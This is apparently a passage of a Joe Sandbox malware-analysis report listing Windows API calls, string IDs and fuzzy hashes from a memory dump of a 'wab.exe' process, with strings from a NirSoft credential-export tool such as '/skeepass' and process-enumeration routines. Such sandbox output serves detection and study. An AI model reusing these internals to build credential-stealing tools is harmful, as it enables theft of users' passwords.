                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                                          • API String ID: 4233704886-1717621600
                                                                                                                                                                                                                          • Opcode ID: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                                                          • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                                                                                                                          • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                          • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                                                                          • Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                          Uniqueness

